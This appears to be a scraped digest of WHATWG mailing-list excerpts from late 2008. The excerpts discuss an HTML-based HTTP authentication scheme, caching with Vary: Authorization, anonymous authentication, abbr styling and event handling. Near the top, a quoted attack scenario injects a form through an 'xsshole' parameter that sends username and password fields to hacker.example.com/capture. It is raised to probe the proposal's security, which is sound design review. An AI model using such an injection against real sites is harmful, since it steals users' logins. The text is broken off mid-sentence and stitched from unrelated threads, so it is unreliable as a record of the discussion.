Ian Hickson wrote:
On Wed, 26 Nov 2008, Philip Taylor wrote:
If I'm not misunderstanding things, there is a new attack scenario:
I post a comment on someone's blog, saying a
href=/restricted-access.php?xsshole=form
action=http://hacker.example.com/capture name=logininput
name=usernameinput
Martin Atkins wrote:
...
I may be forgetting or missing some use-cases here (I don't recall what
exactly motivated this custom auth scheme) but there may still be value
in a cut-down version of this scheme:
...
I concede that once you generalize it in this way it becomes even less
relevant
On Wed, Nov 26, 2008 at 10:38 PM, Ian Hickson wrote:
Ok let me rephrase. What are the user agent requirements for processing
the realm value? For other schemes, it's basically show the realm to
the user as a hint as to what password is wanted.
The realm is (should be) part of the key used by
From: Ian Hickson [EMAIL PROTECTED]
Subject: Re: [whatwg] Feeedback on dfn, abbr, and other elements
related to cross-references
To: Calogero Alex Baldacchino [EMAIL PROTECTED]
Cc: WHAT Working Group whatwg@lists.whatwg.org
Message-ID: [EMAIL PROTECTED]
Content-Type: TEXT/PLAIN; charset=US-ASCII
On Wed, Nov 26, 2008 at 11:40 PM, Martin Atkins wrote:
Julian Reschke wrote:
You can already handle the case of content that's available
unauthenticated, but would potentially differ in case of being authenticated
by adding
Vary: Authorization
to a response.
According to section 14.8
Thomas Broyer wrote:
...
Julian is saying that if your page varies depending on the user being
authenticated and/or the client not being authenticated at all, you
(the origin server) should include a Vary: Authorization.
This means that if a shared cache has cached the response to an
On Thu, Nov 27, 2008 at 1:41 PM, Julian Reschke wrote:
Thomas Broyer wrote:
...
Actually, what's missing from HTTP is a way to ask you to authenticate
but allow anonymous authentication (others have proposed sending a
...
Could you define what anonymous authentication would mean precisely?
Thomas Broyer wrote:
I don't really mind, as long as the server is able to say I give you
this thing to you anonymous user, but you can also authenticate (e.g.
to be proposed more features). This is the exact use-case many web
sites (including most if not all e-commerce web sites) are facing, and
Henri Sivonen wrote:
That seems like a bad optimization. Adding an off-the-shelf HTML parser
to a bot is much easier than tuning the general crawling functionality
and task-specific functionality of a bot.
I suspect this will require far more of the bot than merely parsing
HTML. Many login
On Thu, Nov 27, 2008 at 5:56 PM, Julian Reschke wrote:
Thomas Broyer wrote:
I don't really mind, as long as the server is able to say I give you
this thing to you anonymous user, but you can also authenticate (e.g.
to be proposed more features). This is the exact use-case many web
sites
Asbjørn Ulsberg wrote:
[Response 1]
HTTP/1.1 401 Unauthorized
WWW-Authenticate: HTML realm=Administration
<!DOCTYPE html>
<html>
<form action=/login>
<input name=username>
<input type=password name=password>
<input type=submit>
</form>
</html>
Interesting. If we go down
Julian Reschke wrote:
...
Actually, what's missing from HTTP is a way to ask you to authenticate
but allow anonymous authentication (others have proposed sending a
...
Could you define what anonymous authentication would mean precisely?
I'm not sure this is what the OP meant, but I'd
On Wed, 26 Nov 2008 23:42:33 +0100, Calogero Alex Baldacchino [EMAIL
PROTECTED] wrote:
Martin Atkins wrote:
Your auth token here seems to me to be equivalent to a session cookie.
Yes, it does. But since session cookies are just that: cookies -- it isn't. An
authentication token is
On Thu, 27 Nov 2008, Pentasis wrote:
Actually, it would solve a problem like this:
What if I style abbr so that the title attribute is shown after the
abbreviation:
abbr[title]:after {
content: " (" attr(title) ")";
}
Now obviously I don't need and don't want to do this for every
On Thu, 27 Nov 2008 22:38:32 +0100, Garrett Smith [EMAIL PROTECTED]
wrote:
It is often desirable to capture events on bubble and interrogate the
EventTarget using a hasClassName function to see if it has a className
that the program is concerned with.
[...]
HTML5 already has the
Calogero Alex Baldacchino wrote:
That worked fine on Opera 9 and FF2, but, when tried on IE7, the show
became a little weird... the element was there, the style attribute was
regarded as for any other element (display:block worked), but didn't
apply to any of its descendants, as if they